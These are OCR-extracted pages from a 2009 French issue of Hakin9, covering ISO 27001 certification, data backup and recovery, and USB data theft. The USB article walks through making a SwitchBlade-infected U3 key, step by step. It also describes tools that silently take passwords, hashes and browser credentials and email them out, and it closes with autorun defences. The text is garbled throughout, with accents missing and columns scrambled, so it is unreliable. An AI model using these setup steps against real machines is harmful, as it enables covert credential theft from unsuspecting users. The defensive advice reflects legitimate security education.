AFAQ-AFNOR) (www.afaq.com), galement accrdite auprs du COFRAC. Le COFRAC est l'autorit d'accrditation pour la France, structure sous forme d'association, reconnue par les pouvoir publics tels que dfini dans le code de la consommation dans l'article L115-28. Les autorits d'accrditation de chaque pays se reconnaissent entre elles, et s'auditent entre elles, ainsi les certifications mises par les organismes de certification accrdits sont valables l'international. Les organismes de certification qui ont choisi de ne pas accrditer leur programme de certification suivant la norme ISO 17024 montrent qu'ils ont dlibrment choisi de ne pas suivre les rgles d'indpendance et d'impartialit imposes par l'ISO 17024. Avec l'ISO 17024, le formateur ne peut pas tre l'auteur des examens, ne peux pas les connatre en dehors de son propre passage de l'examen, et le formateur ne peux pas tre celui qui corrige les copies d'examen. C'est l'examinateur travaillant pour l'organisme de certification qui conoit l'examen et corrige les copies. Une indpendance totale est impose entre formateur et examinateur par la norme ISO 27024 pour viter tout risque de copinage. C'est ce qui donne de la qualit et de la difficult l'examen, et apporte aussi la valeur de la certification. Si quelqu'un vous dit venez chez moi ma certification est facile, c'est ncessairement que celui qui vend la formation n'est pas indpendant avec la certification. Il faut choisir sa socit de formation en y intgrant le choix de l'organisme de certification avec lequel travail la socit de formation.

Comment russir sa certification, quelles sont les aides

Une bonne formation est autosuffisante pour russir sa certification. Il n'est pas ncessaire d'avoir travaill intensment le sujet avant la formation. Il faut avoir un minimum d'exprience en informatique et sur la scurit de l'information. Il n'est cependant nullement ncessaire d'tre un expert, il faut plutt tre organis, logique, rigoureux, et savoir organiser son temps pour russir un examen en temps limit. La semaine de formation est parfois intense, il vaut mieux ne pas avoir plusieurs heures de transport chaque jour. Quiconque est ingnieur en informatique et connat les bases en scurit peut russir l'examen en tant assidu lors de sa formation. Mme si la lecture des normes est difficile et rbarbative, il est prfrable

Figure 3. Couverture de la norme ISO 17024 et du livre Management de la Scurit. de les acqurir et les lire avant la formation, notamment pour l'ISO 27001 et l'ISO 27005. La formation en sera plus aise, la comprhension des normes meilleure, et le travail durant la semaine moins lourd. Cela n'est pas indispensable mais l'exprience montre que c'est une aide. Il n'est pas possible de passer la certification sans avoir suivi au moins une fois la formation. C'est notamment impos pour les auditeurs dans la norme ISO 19011 (7.4.1 et 7.4.4), c'est pour cette raison qu'il n'est pas possible de passer l'examen sans suivre la formation. Il existe cependant des livres sur l'ISO 27001 comme Management de la Scurit de l'Information par Alexandre FernandezToro, publi aux ditions Eyrolles qui est beaucoup plus facile lire que les normes elles-mmes et les explique bien, cependant rien ne remplace la lecture des normes.

Figure 2. Site officiel de lassociation CORFAC

68 HAKIN9 2/2009

66_67_68_69_Pod_Lupa.indd

68

2009-01-09, 11:44

Comment mettre en valeur une certification obtenue

Comment conserver sa certification

Conclusion

Chaque certifi a le droit d'arborer sa certification sous la forme du logo de l'organisme de certification. Dans son CV cela est du plus bel effet cependant les recruteurs n'y sont pas ncessairement sensibles, il vaut mieux garder ce type de CV quand on est dans une socit de service. La mention de la certification doit prciser l'organisme qui l'a dlivr, et dans la mesure du possible sont n de certificat. Le registre de l'organisme de certification permet de retrouver les auditeurs qui ont choisi d'y tre enregistrs. Sur certains rseaux sociaux un logo contrl par l'organisme de certification permet de montrer sa certification, c'est le cas pas exemple pour l'IRCA et LSTI qui ont un groupe sur LinkedIn (www.linkedin.com).

Pour conserver sa certification, il faut mettre en pratique, donc auditer des SMSI pour ISO 27001 Lead Auditor, participer la mise en uvre de SMSI pour ISO 27001 Lead Implementer et participer la gestion de risque en scurit de l'information pour ISO 27005 Risk Manager. Tous les ans comme l'IRCA ou tous les 3 ans chez LSTI, il faut payer et dclarer son travail pour demeurer certifi et affich dans leur registre. Le repassage de l'examen est cependant ncessaire quand le rfrentiel change, par exemple les certifis actuels le sont par rapport la norme ISO 27001 dans son dition de 2005. La nouvelle version est prvue entre 2010 et 2012, ce moment l il faudra repasser l'examen pour tre certifi sur cette nouvelle version. Les socits de formation proposeront des formations spciales courtes pour passer d'une version l'autre. U B L I C I

Au-del d'tre ncessaires pour mettre en uvre la srie des normes ISO 27001, les formations ISO 27001 Lead Implementer, ISO 27005 Risk Manager et ISO 27001 Lead Auditor correspondent toutes les fonctions de base indispen-sables une bonne organisation de la scurit des systmes d'information en entreprise. Ces formations permettent aux ingnieurs ayant une carrire technique de s'orienter vers les aspects organisationnels, ceux qui viennent de la production informatique de s'orienter vers la scurit, et elles reprsentent un panouissement personnel indniable qui explique leur succs, puisque plus de 500 personnes ont une certification personnelle sur l'ISO 27001 en France. Herv Schauer

-est consultant en scurit informatique et dirigeant dHSC depuis 1989. Pour en savoir plus voir son interview dans le mme numro.

2/2009 HAKIN9

69

66_67_68_69_Pod_Lupa.indd

69

2009-01-05, 19:56

DIDIER SICCHIA

Degr de difficult

BACKUP Politique de gestion des donnes

Il y a 111 ans, un danois du nom de Valdemar Poulsen, a eu l`ide d'enrouler sur un cylindre un fil d'acier spires jointives qu'un lectro-aimant parcourait en dposant une aimantation variable suivant les paroles prononces devant un micro d'appareil tlphonique. Ainsi, l'enregistrement magntique tait n.

CET ARTICLE EXPLIQUE...

Les principes de la gestion de donnes en entreprise. La mise en uvre d'une solution de gestion individuelle. Le modle d'un grand groupe spcialis dans la gestion des donnes.

CE QU'IL FAUT SAVOIR...

Un quelconque historique de l'informatique en gnral. Comprendre le principe sommaire de l'information numrique. 70 HAKIN9 <<NUMER_LEWY>>

a gestion globale des donnes n'est pas seulement rserve aux entreprises importantes. Quant aux volumes des nouveaux supports HD externes, parfois plusieurs milliers de Giga octets, on a tendance ne plus rien effacer et garder tout et n'importe quoi. Aucune slection de fichiers n'est tablie malgre dune rigueur ncessaire. Ainsi, arrive le jour o il faut transfrer des donnes, formater un disque dur interne ou externe, partager des informations en ligne, etc. En d'autres termes, parfois nous pchons par omission dans la bonne gestion des donnes et informations multiples. Des lors, comment effectuer ces susdites oprations par moment astreignantes ou douloureuses, s'il se produit un incident fcheux ? Cet article se propose d'examiner la mthode rflchie d'un grand groupe, afin d'offrir aux entreprises une migration, un transfert ou une destruction de donnes efficace. Disposant de cette exprience supplmentaire, les particuliers que nous sommes, auront plus de facilit percevoir les avantages et les inconvnients de certaines alternatives. L'poque de l'archivage sur le seul support papier est aujourd'hui rvolue. Mme les bibliothques nationales en viennent numriser de nombreuses uvres littraires ou des documents historiques. L'ensemble

des commerces ou entreprises est oblig de souscrire un partage de donnes via les supports numriques et aussi l'internet. Ajoutons encore les tonnantes possibilits technologiques propres aux outils BlueTooth, WiFi et USB. Effectivement, tout va vite ... trs vite par moment. Cette simplification des changes au quotidien permet d'amliorer les prestations et services de chacun. Afin d'illustrer cette introduction, nous vous proposons une seule rflexion simple : le prsent article. Dans la mme journe, il pourra tre lu par plusieurs correcteurs, corrig le cas chant, retourn au rdacteur pour de nouvelles modifications et, finalement aboutir dans la messagerie lectronique du rdacteur en chef. Si nous tions encore l'poque des seuls envois postaux, il aurait fallu plusieurs semaines pour un rsultat similaire. Or, si tout va trs vite, il en est de mme de l'accroissement des changes et transactions lectroniques. Le dilemme survint alors : comment grer l'ensemble des donnes ? Eu gard la complexit d'une croissance exponentielle des volumes de donnes, la difficult de prserver une disponibilit optimale des informations est une question majeure. Une entreprise qui ne sait (ou ne peut) grer un environnement de partage, de restauration ou de migration des donnes est une entreprise qui perd autant d'nergie que d'argent. Parfois,

70_71_72_73_74_75_Datarecovery.indd

70

2009-01-06, 19:28

POLITIQUE DE GESTION DES DONNES

les procdures de sauvegarde ou de restitution des donnes engagent beaucoup trop de moyens astreignants et coteux. Or, plusieurs alternatives existent afin d'aboutir une gestion plus efficace et scurise des donnes. Ce dossier se consacre notamment aux avantages de la sauvegarde en ligne. Or, l'expression gestion des donnes est un terme peu explicite de primes abords tant les utilisations peuvent tre varies. Il ne s'agit pas seulement de stocker des informations sur support numrique quelconque. Il faut aussi protger les donnes et garantir la confidentialit. Dans notre article, nous traiterons de 5 opportunits, 5 services que proposent certaines entreprises : la protection des donnes, la rcupration des donnes, la migration des donnes, la restauration des donnes, l'effacement des donnes. et serveurs en stockant les sauvegardes dans des centres de donnes distants haute scurit. Il suffit de slectionner les donnes qu'on souhaite protger et d'tablir une planification de sauvegarde selon l'entreprise. Les donnes sont dupliques, compresses trs largement et chiffres selon AES, avant d'tre transfres vers des centres de donnes de premier rang. Ajoutons que toutes les donnes sont protges, du transit au stockage et qu'on vite au passage les doublons. Ainsi, il est possible de bnficier d'un stockage externe et scuris, idal pour une rcupration des donnes aprs sinistre ventuel. De plus, le contrle du trafic rseau allou aux sauvegardes est optimal comme le volume de stockage rduit. L'ensemble de la procdure s'excute via un navigateur Web quelconque et en quelques clics de souris. Ce service pertinent nous suggre alors de dvelopper une solution de sauvegarde des donnes externe et intuitive. Cette politique de gestion doit donc trouver un quilibre entre trois aspects cruciaux (on est bien loin d'un simple BackUp dit sur CD ou DVD) : la simplicit de la procdure (transparence et automatisme), une protection durant le transit (chiffrement et compression), une restauration garantie et facile (intgrit des donnes, etc).

La rcupration des donnes

Objectivement, il n'est pas possible de s'apesantir sur les codes et dautres algorithmes mise en uvre afin de dvelopper ces diffrentes applications. D'ailleurs, ces solutions sont bien souvent le seul apanage des entreprises importantes. Nanmoins, il est particulirement intressant de comprendre la politique engage afin de correspondre aux diffrents besoins. Elle constitue une rflexion digne d'intrt pour ceux qui dsirent dvelopper une politique de scurisation des donnes personnelles, mme en environnement restreint (ou encore domestique). En finalit, la gestion des donnes repose principalement sur une rflexion responsable et une rigueur inflexible.

Qui n'a jamais malencontreusement effac des donnes importantes et sous la forme d'un fichier quelconque ? Les philosophes diront que l'erreur est humaine. Nanmoins, une situation de cet acabit peut poser de graves problmes avec un client ou un membre de sa hirarchie. Il faut donc avoir un joker dans sa manche ! Il existe des solutions, des applications de restauration des donnes corrompues ou abmes. Elles s'utilisent dans des cas d'une extrme gravit lorsque les donnes en question sont particulirement sensibles ou importantes et qu'il faut trouver une solution logicielle peu coteuse afin de restaurer un contenu. Voici une liste non exhaustive de situations cauchemardesques que des logiciels professionnels peuvent corriger partiellement ou totalement :

Figure 1. Implmentation d'une solution de protection

La protection des donnes

La solution de protection des donnes Evault propose un service de sauvegarde en ligne simple et scuris afin de migrer les donnes sensibles directement vers des centres de rtention de donnes (coffres-forts) et via internet. La procdure est simple raliser, aucune connaissance particulire n'est ncessaire. Cette solution protge l'ensemble des PC de bureau, portables

Figure 2. Une rcupration des donnes avec Avira UnErase

<<NUMER_PRAWY>> HAKIN9 71

70_71_72_73_74_75_Datarecovery.indd

71

2009-01-06, 19:28

BACKUP
un formatage accidentel du disque dur s'est produit, un virus a caus des ravages sur de quelconques supports de mmoire, Slave ou Master le support est inutilisable (problme matriel), des fichiers ont t envoys la corbeille par erreur, etc. fichiers FAT12/16/32 et NTFS. Dans cet article, vous trouverez une illustration montrant la capacit de restaurer des fichiers sur un ordinateur domestique. Parmi les applications les plus pratiques, on retrouve notamment (liste non exhaustive) plusieurs programmes gratuits dont l'efficacit n'est pas toujours idale. Nous citons par exemple : Restoration, Davory, Data Advisor, Drive rescue, Roadkil Unstoppable Copier, Avira UnErase. proprits ne permettent pas de rpondre aux besoins du moment. Peut tre est-il obsolte. En attendant, il faut prendre des mesures afin de progresser vers d'autres systmes. Au fil des saisons, les diffrentes applications utilises deviennent lourdes et certaines d'entre elles ne dispose plus de mises jour rgulires, etc. En d'autres termes, il est grand temps de migrer vers des outils plus adapts. Or, la migration des donnes doit tre considre comme une manipulation dlicate. Dans certains cas, elle ncessite bien plus qu'un simple ajustage. Il faut compltement modifier des projets, des protocoles, etc. Prenons un exemple explicite (et particulirement exagr, penserez-vous). Durant 10 ans, une socit de dveloppement quelconque a dvelopp des applications professionnelles en utilisant la station MSVC v6 de Microsoft. L'ensemble des projets est archiv sur des disques durs externes formats FAT32. Aujourd'hui, elle souhaite utiliser une autre station de travail comme Visual C++ Express 2008 (beaucoup plus rcente) ou encore autre chose. Le problme est important, VC++ 2008 dispose d'un environnement de travail trs diffrent de MSVC v6. La socit en question dcide aussi de stocker ses informations et donnes sur des supports distants (en ligne). Aussi, le nouvel environnement de travail reposera sur une architecture NTFS. Par consquent, il y a un problme de compatibilit directe parmi la multitude des fichiers, des OS, des applications, etc. La migration des anciens projets vers la nouvelle station de dveloppement est possible mais astreignante tant en temps qu'en nergie. Ajoutons encore une quantit d'informations obsoltes ou corrompues datant du dbut des annes 90 sur support disquette 31/2 et 51/2. Comment faire au mieux afin de migrer efficacement ? La migration des donnes est donc le processus consistant transfrer des donnes d'un type de stockage, de format ou de systme informatique vers un autre plus performant. Elle est souvent requise lorsque les organisations changent de systmes informatiques ou effectuent des mises jour vers de

Or, certaines applications professionnelles disposent d'une capacit importante de restauration. Elles sont capables de restaurer des fichiers que les logiciels standards de restauration ne peuvent mme pas lire. Certains programmes sont dvelopps essentiellement pour Windows et permettent de rcuprer tous types de fichiers notamment Word, Excel, PowerPoint, PST Outlook, bases de donnes, AutoCAD ou Microsoft SQL, ainsi que les formats d'image les plus courants, mais aussi des fichiers de musique et de vido aux formats MPEG, AVI et MP3. Aussi, on a la possibilit de rcuprer des fichiers supprims de votre corbeille et mme si le disque dur a t format par accident. Encore une fois, aucune connaissance technique particulire n'est requise pour ces diffrentes oprations. L'ensemble de la procdure se droule dans une environnement particulirement intuitif. Un outil de rcupration doit tre compatible avec tous les systmes de

Par contre, certains ShareWares donnent des rsultats plus que convaincants. Par exemple, il existe une application nomme FileRecovery. Ce programme dispose d'une aptitude impressionnante retrouver et restaurer des fichiers abms ou effacs par mgarde. De plus, il est possible de disposer d'une version d'valuation qui permet de visualiser l'ensemble des fichiers rcuprables avant d'envisager l'achat d'une licence (environ 100 euros).

La migration des donnes

Certaines entreprises disposent d'un environnement informatique dont les

Figure 3. Une rcupration des donnes avec FileRecovery.tif posx=c posy=c fit=W grow=H/>>
72 HAKIN9 <<NUMER_LEWY>>

70_71_72_73_74_75_Datarecovery.indd

72

2009-01-06, 19:28

nouveaux systmes. Gnralement, on utilise des logiciels spcialiss pour automatiser ces migrations puisque l'opration comporte de nombreux aspects sensibles. Ce peut tre aussi par moment un vrai sac de nuds (voir l'exemple prcdent). Pendant le processus, les donnes historiques stockes sur des supports anciens ou obsoltes sont values, indexes et dupliques. Elles sont ensuite migres vers un support plus rcent, plus fiable et plus conomique. En conclusion, une migration des donnes responsable apporte diffrents avantages importants : gestion des systmes proactive, rduction des cots de stockage, mthodologie des donnes rationalises, politique de conservation des donnes responsable.

nouveau support de stockage et le nouvel environnement.

La restauration des donnes

Dans un environnement rduit (peut tre mme domestique) une migration des donnes doit comporter plusieurs rflexions. Dans notre prcdent exemple, ne comptez pas compiler un code MSVC sous GCC linux. Il faut donc comprendre tant les besoins que les astreintes, les avantages et les rigueurs. Chaque cas tant diffrent des autres, il convient de bien comprendre les besoins propres chacun. Dans le marasme des informations engranges durant des annes, le plus important n'est pas le logiciel de migration des donnes. Avant tout, il faut absolument dfinir la politique adquate et propre l'entreprise seule. La pense du groupe se dfinit en 5 points importants : coopration avec le client afin d'valuer les supports et la nature des donnes, un support cible est alors dfini avec le client pour la future distribution des donnes, les donnes sont migres (restauration ventuelle des donnes corrompues), les donnes sont indexes, dupliques et purges afin de rduire l'encombrement de stockage, les donnes sont restitues via le

La restauration des donnes ne consiste pas restaurer des supports corrompus ou abms (nanmoins, une rcupration sera ncessaire dans des cas particuliers). Il s'agit de restituer un ensemble important d'informations enregistr sur un support obsolte. Si l'informatique d'aujourd'hui apporte des alternatives en matire de stockage pratique, ce n'tait pas aussi facile 25 ans en arrire. Effectivement, la majorit des enregistrements de donnes s'effectuaient sur des bandes magntiques et de manire analogique. D'ailleurs, on peut lgitimement douter que nos plus jeunes lecteurs n'aient jamais eu l'occasion de voir une disquette 5 (modle Apple 2E et Apple 2C). Imaginez encore les bandes magntiques sur bobines libres ou les galettes aussi. Afin de restaurer des donnes qui reposent sur de vieux supports, il faut disposer de machines particulires tant le nombre des procds est important. Voici une liste non exhaustive (type et constructeur confondu) : DLT II, III, IV, TK50/TK70, Cartouches SLR/MLR, 8mm Exabyte Mammoth, AIT Mini-cartouches DC2000, Cartouches Ditto, Cartouches Travan, Cartouches Irwin Rhomat, Cassettes DCC, Cartouches 1/2" 3480, 3490, 3590, DC600A, DC6150, DC6525, Magnus, DAT 4mm DDS1, DDS2, DDS3, Bobines 9 pistes 1/2", Cartouches 3570 1/2", Disques optiques WORM 5,25" et 3,5", Disque magnto-optique L/E 5.25", 3.5", Disques optiques 12.

Le contexte lgislatif et de mise en conformit actuel oblige les socits de sassurer de la disponibilit permanente des donnes. Que se passe-t-il en cas de panne sur la grappe de stockage qui hberge vos donnes? De plus, il ne faut pas oublier que tout quipement ou
<<NUMER_PRAWY>> HAKIN9 73

70_71_72_73_74_75_Datarecovery.indd

73

2009-01-06, 19:28

BACKUP
Sur Internet
http://www.i365.com Le site officiel du groupe i365 (applications FileRecovery et Evault), http://seagatedatarecovery.com Le site officiel Seagate spcialis dans la gestion des donnes en entreprise, http://www.free-av.com/en/index.html Site officiel du groupe Avira (application freeware de restauration UnErase), http://en.wikipedia.org/wiki/Valdemar_Poulsen Un historique du projet premier relatif l'enregistrement analogique, http://www.generation-nt.com/torrentspy-mpaa-valence-media-actualite-14813.html Un hacker repenti reconnat avoir fouiller les poubelles du groupe TorrentSpy.

composant matriel est susceptible de tomber en panne un jour ou l'autre. Or, la diffrence entre une situation de crise et un dsagrment, c'est la capacit rgler le problme provoqu par cette panne lorsqu'elle survient. En conclusion, il n'est pas sage de disposer d'informations sensibles sur support obsolte en ayant l'assurance que a marchera toujours mme dans 10 ans. Afin de palier ce problme, de nombreuses socits se proposent de migrer les donnes contenues sur de vieux supports vers des outils plus pertinents, fiables et pratiques.

La destruction des donnes

Malgr ce qu'on pourrait penser, l'limination scurise des quipements informatiques est une proccupation de premier plan pour les responsables informatiques. On imagine bien que les donnes stockes sur des disques durs, fichiers contenant des dossiers relatifs des transactions financires, des secrets commerciaux ou le code source de logiciels doivent subir un traitement particulier entre leur cration et leur destruction. Lorsque des ordinateurs et des systmes de stockage arrivent en fin de vie et sont mis hors service, les donnes stockes sur les disques durs de ces units doivent tre totalement et dfinitivement retires de manire scurise pour s'assurer que les informations dposes et sensibles ne tombent entre de mauvaises mains. Sur internet, on peut retrouver d'tranges rcits relatifs aux piratages des poubelles d'entreprises importantes afin de dcouvrir des informations particulires (factures, fax, etc). Ajoutons que celles-ci peuvent se ngocier plusieurs milliers d'euros auprs de
74 HAKIN9 <<NUMER_LEWY>>

la concurrence. Face cette relle motivation, de nombreuses socits finissent par stocker leurs anciens disques hors service dans des locaux sous cl qui ncessitent souvent la location de plus en plus chre d'un espace en entrept priv. L'alternative cette astreinte est l'effacement radical des donnes. Ds lors, on ne parle pas prsentement d'un simple formatage. Il est intressant de signaler qu'il existe diffrents outils d'effacement de donnes (certains sont mme gratuits). Malheureusement, ils ne disposent pas toujours d'algorithmes complexes afin d'effectuer un formatage radical et garanti. Par contre, les professionnels fournissent systmatiquement un certificat d'effacement. Cette assurance nous permet d'liminer ou de recycler un disque dur en toute confiance et sans avoir se proccuper de l'avenir du support HD. D'ailleurs, ces solutions sont approuves par la NSA, le dpartement amricain de la dfense, les services des forces armes amricaines, le NCSC et lOTAN, etc. Ces solutions engagent par moment des applications complexes notamment au sein d'un large rseau d'entreprise ou via l'internet. Nanmoins, diffrentes entreprises proposent aussi ce service aux particuliers et petites ou moyennes entreprises via une cl USB sur laquelle est embarque la solution adquate. Une ide cadeau pour les administrateurs soucieux de rpondre quelques angoisses lgitimes eu gard l'environnement concurrentiel et volutifs de ces temps de crise.

proposs par de nombreux prestataires de services. Chacun trouvera son compte via internet et selon ses besoins propres. Mme s'ils sont plusieurs prsenter une gestion apprciable des donnes, les concurrents disposant des 5 politiques dveloppes dans ce dossier ne sont pas trs nombreux. Lorsqu'il faut s'informer auprs d'un professionnel afin de lui confier une partie ou la totalit de ses donnes confidentielles (autant dire la vie et la mort de l'entreprise), il convient de faire le bon choix. Il est ncessaire de faire appel aux entreprises spcialise. Nanmoins, sur la toile, il est possible de trouver de nombreuse applications afin de grer l'information numrique dans un cadre domestique (petite entreprise encore). Ainsi, il n'est pas ncessaire d'engager des sommes importantes si les besoins sont particulirement rduits. D'ailleurs, le DVD hakin9 fourmille de nombreuse applications intressantes et gratuites notamment dans ce registre particulier. Cet examen sommaire d'une politique de gestion des donnes en entreprise nous aide bien cerner les bonnes habitudes dvelopper dans un contexte individuel, comprendre domestique. Traditionnellement, les difficults surgissent lorsqu'il n'y a aucune rigueur dans la gestion des donnes. Ceci est bien regrettable. Personnellement, il m'est dj arriv de devoir formater et rinstaller un OS sur des ordinateurs quelconques alors que les propritaires oublieux n'avaient pas gard soigneusement les CD de drivers. Il s'agit d'une perte de temps considrable. N'oubliez-pas (et malgr ce qu'on pourrait penser) : la rigueur d'une gestion responsable des donnes vous facilitera grandement la vie et garantira la prennit de vos informations personnelles. Sicchia Didier

Conclusion

Certes, l'ensemble des principes et des applications cits durant cet article sont

Sicchia Didier est l'origine de nombreux exploits, dossiers et articles divers pour plusieurs publications francophones consacres la scurit informatique et au dveloppement. Autodidacte et passionn, son exprience se porte notamment sur les ShellCodes, les dbordements d'allocations de mmoire, les RootKits, etc. Plus que tout autre chose, c'est l'esprit alternatif de la communaut UnderGround qui le motive. Pour contacter l'auteur : didier.sicchia@free.fr

70_71_72_73_74_75_Datarecovery.indd

74

2009-01-06, 19:28

<<NUMER_PRAWY>> HAKIN9

75

70_71_72_73_74_75_Datarecovery.indd

75

2009-01-06, 19:26

DBUTANTS
NICOLAS RENARD

USB dumping
Degr de difficult

L'objectif de cet article est de montrer quon peut tr facilement voler des donnes ou mme de sen faire voler cause dune cl usb et la dtection automatique de Windows.

es cls USB (Universal Serial Bus) reprsentent aujourd'hui un support privilgi pour le stockage et le transport de donnes et donc le vol de donnes et l'inoculation de parasites, surtout depuis le standard U3. Elles permettent une utilisation beaucoup plus souple et un espace disponible toujours plus important. Le standard U3 permet de stocker sur des cls USB des applications autonomes qui s'excutent automatiquement lorsque celles-ci sont connectes un ordinateur. Les cls U3 sont susceptibles de contenir plusieurs informations personnelles ou confidentielles. Le vol de celles-ci peut avoir des consquences importantes: La configuration du client de messagerie et ses contacts, les sites favoris installs sur le navigateur, des mots de passe grs par une application ddie (application frquemment offerte par dfaut avec la cl).

Vols de la cl vers l'ordinateur

Un processus tournant en arrire plan, dissimul par un crochetage (hook) afin de ne pas apparatre dans la liste des processus, peut-tre en coute dune quelconque clef USB qui serait connecte lordinateur infect pour en copier en arrire-plan son contenu. Certains outils permettent de faire une image complte de la cl (toute la mmoire y compris celle sense ne pas/plus contenir de donnes pour votre systme dexploitation), rcuprer certains types de fichiers et vous les envoyer par mail, par ftp

Vol de l'ordinateur vers la cl

CET ARTICLE EXPLIQUE...

Que la connection de cl USB l`ordinateur peut provoquer les effets nfastes.

CE QU'IL FAUT SAVOIR...

Qu`il faut toujours penser crypter ses donnes avant la connection de cl USB l`ordinateur, car cet action pourra provoquer le vol des donnes. 76 HAKIN9 2/2009

Ces cls sont gnralement fournies avec un lanceur (Launchpad). Lors de linsertion de la clef celui-ci donne accs aux diverses applications. Certains lanceurs malveillants permettent d'excuter directement des actions l'insertion de la cl, et sont fournis avec des outils permettant de rcuprer les tables de mots de passe, d'installer une capture de clavier ou un rootkit.

Cette technique reprsente la mthode inverse. Il sagit dun programme situ sur la cl qui va copier des donnes prsentes sur lordinateur. Pour ce faire, la cl peut contenir un amorage automatique (autorun) et, lorsquelle est branche sur un ordinateur victime, une application ou un spyware peut tre implant silencieusement sur la machine et excuter les fonctions pour lesquelles il a t programm (vol de mots de passe (Internet, Windows, etc.), favoris Internet, carnet d'adresse, de documents spcifiques (Word, pdf....). Il suffit alors de se brancher quelques minutes sur un port USB pour lancer silencieusement une copie d'une partie d'un disque dur vers ce priphrique amovible.

76_77_78_usb_dumping.indd

76

2009-01-05, 18:27

LA CL USB ET LA SCURIT
Quelques outils
nombre dinformations concernant le systme lui-mme, mais aussi dtruire ces informations. De plus celui-ci est compatible avec Windows XP et Windows Vista. Voici une liste des principales informations quil supporte: password hashes, LSA secrets, ip informations, Dump SAM, Internet Explorer Password Grabber, Windows Update Lister, Netstat, Messenger password Dumper, FireFox Password Stealer, Silent VNC installer (with external IP send), Username adder, FireFox Password Stealer. Fermez toutes les applications U3 puis accdez votre lecteur et cliquez sur Suivant. Dfinir un mot de passe pour la sauvegarde des fichiers zip Cliquez sur Suivant et il commencera la sauvegarde de donnes. Attendez que le Customizer universel ait fini de modifier votre partition CD et de remplacer vos fichiers sur le lecteur flash. La modification doit maintenant tre complte, dbranchez votre cl U3 et rebranchez-la. Copier C:\SwithBlade\SBConfig.exe sur la partie stockage de la cl. Excuter SBConfig.exe Slectionnez les options que vous souhaitez utiliser et indiquez votre adresse e-mail et votre mot de passe (si vous souhaitez recevoir ces informations par e-mail). Cliquez sur le bouton Update Config, une bote de message devrait apparatre pour confirmer la mise jour puis cliquez sur Turn on PL/ Turn off PL selon que vous souhaitiez activer ou non le payload. Enfin, cliquez sur le bouton turn U3 Launchpad On pour activer linfection de lapplication U3.

Les outils prsents ici fonctionnent essentiellement sous un environnement Windows XP ou Vista. Les systmes Linux et MacOSX ne semblent pas affects par ce genre de problme.

USB Dumper
USB Dumper est un programme qui fonctionne sur lordinateur et non pas sur la cl. Il est donc ncessaire que la personne victime connecte sa cl USB sur lordinateur de lassaillant. Cependant il peut-tre intressant de savoir que dans la majorit des cas, une personne prfre connecter sa cl USB sur lordinateur de la victime, plutt que de laisser une clef USB inconnue et branche sur son propre ordinateur. Pour expliquer lintrt dun tel logiciel, prenons un exemple: imaginez une grande confrence/salon runissant plusieurs salaris de diverses entreprises dans un htel ou un autre disposant dun accs Internet, impression, avec accs au port USB activ. Il peut-tre intressant pour une personne malveillante dinstaller ce logiciel sur cet ordinateur, esprant ainsi rcuprer une grande quantit de donnes aprs ce meeting Cela marche aussi bien pour les cybercafs. Lutilisation de ce logiciel tant trs simple, je vous laisse la dcouvrir par vous-mme.

USB SwithBlade exige des privilges d'administration afin de pouvoir lancer la charge utile.

Installation de SwithBlade
Tout dabord, il est important de possder une cl USB de type U3 car le logiciel par dfaut va tre infect et customis par SwithBlade. Plusieurs faons de linstaller sont possibles. Il est possible dutiliser des systmes dinstallation automatique pour les cls SanDisk & Memorex ou des installations hybrides (U3 & manuel). Ici, nous allons utiliser deux outils: Gonzor SwithBlade et Universal customiser pour modifier le logiciel de la cl. Lintrt de lUniversal customiser est la possibilit de remplacer le firmware dorigine stock sur la cl USB par un firmware modifi et infect par SwitchBlade. Ainsi, SwitchBlade sera charg linsertion de la cl dans lordinateur. Voici la procdure suivre: Dcompressez le Customizer universel dans C:\Universal_ Customizer Dcompressez le gonzor SwitchBlade payload dans C:\SwitchBlade Copiez le fichier U3CUSTOM.ISO de C:\SwitchBlade dans C:\Universal_ Customizer\BIN Executer C:\Universal_Customizer\ Universal_Customizer.exe. Slectionnez Accepter et cliquez sur Suivant .

USB Hacksaw
USB Hacksaw est une version modifie dUSB dumper et une extension dUSB SwithBlade. Ce programme fonctionne toujours en arrire plan sur la machine cible, mais permet en plus de faire une copie de la cl USB et denvoyer son contenu via la messagerie Gmail en utilisant une connexion SMTP scurise. Cette application permet en plus d'ventuellement contaminer la cl USB connecte afin de propager loutil sur dautres machines. Dans le cas dune entreprise, ce type dattaque peut devenir trs grave et peut constituer une faille de scurit.

Voila votre cl est maintenant prte. Il ne vous reste plus que la connecter sur un ordinateur de type Windows et le tour est jou.

Quelles scurits mettre en place

Nous avons pu voir qu'il peut-tre trs facile de crer une cl USB pirate et de se faire voler ses donnes. Nous allons maintenant voir quelques techniques permettant de se prmunir de se genre de problme et ainsi viter d'avoir des donnes confidentielles dans la nature.

Bloquer la Fonction Autorun

La fonction autorun consiste en l'excution automatique d'un logiciel se trouvant un emplacement rserv sur un dispositif de stockage, ds que celui-ci est connect un systme hte. Vous pouvez vous en apercevoir en insrant un DVD, un CD, etc. Une fentre de navigation, ou lexcution dun logiciel apparat automatiquement.
2/2009 HAKIN9 77

USB SwithBlade
USB SwithBlade emmne encore un peu plus loin la rcolte dinformations. En effet, il permet de rcouperer un bon

76_77_78_usb_dumping.indd

77

2009-01-05, 18:27

DBUTANTS
Normalement, un dispositif USB de stockage ne permet pas cette excution automatique. Le standard U3 a fait en sorte que les cls USB soient vues comme un lecteur de CD ou de DVD lors de leur insertion, rendant ainsi possible la fonction Autorun pour ces dispositifs. Cette fonction n'tant pas forcment ncessaire il peut tre intressant de la dsactiver. Vrifier, en cas de soupon, tout fichier inconnu trouv sur une cl USB. Protger les donnes places sur une cl USB sous une forme chiffre ncessitant une extraction pour pouvoir les utiliser. Cette solution introduit une tape supplmentaire qui peut paratre contraignante mais particulirement utile le paramtre NoDriveTypeAutoRun qui contrle lactivation ou non de lexcution automatique pour les priphriques. Sous Windows, laide de lditeur de la base de registre regedit suivre le chemin suivant: HKEY_CURRENT_USER/Software/ Microsoft/CurrentVersion/Policies/Explorer/. Le paramtre NoDriveTypeAutoRun dfini sur 0x95, dsactive l'excution automatique sur les lecteurs, les priphriques rseaux et les priphriques amovibles inconnus. partir de Windows XP SP2 (SP3 inclus), le paramtre NoDriveTypeAutoRun est configur sur 0x91 par dfaut. Cela active l'excution automatique sur les priphriques de stockage amovibles. En utilisant la stratgie de groupe, il existe un paramtre sous Configuration utilisateur\Modles d'administration\Composants Windows\ Stratgies de lecture automatique qui vous permet de grer le paramtre NoDriveTypeAutoRun. La slection de l'option Dsactiver l'excution automatique et slectionner les lecteurs de CD-ROM et lecteurs amovibles dsactive l'excution automatique sur les deux types de lecteurs. Pour Windows Vista allez la cl suivante: HKEY_LOCAL_MACHINE\ 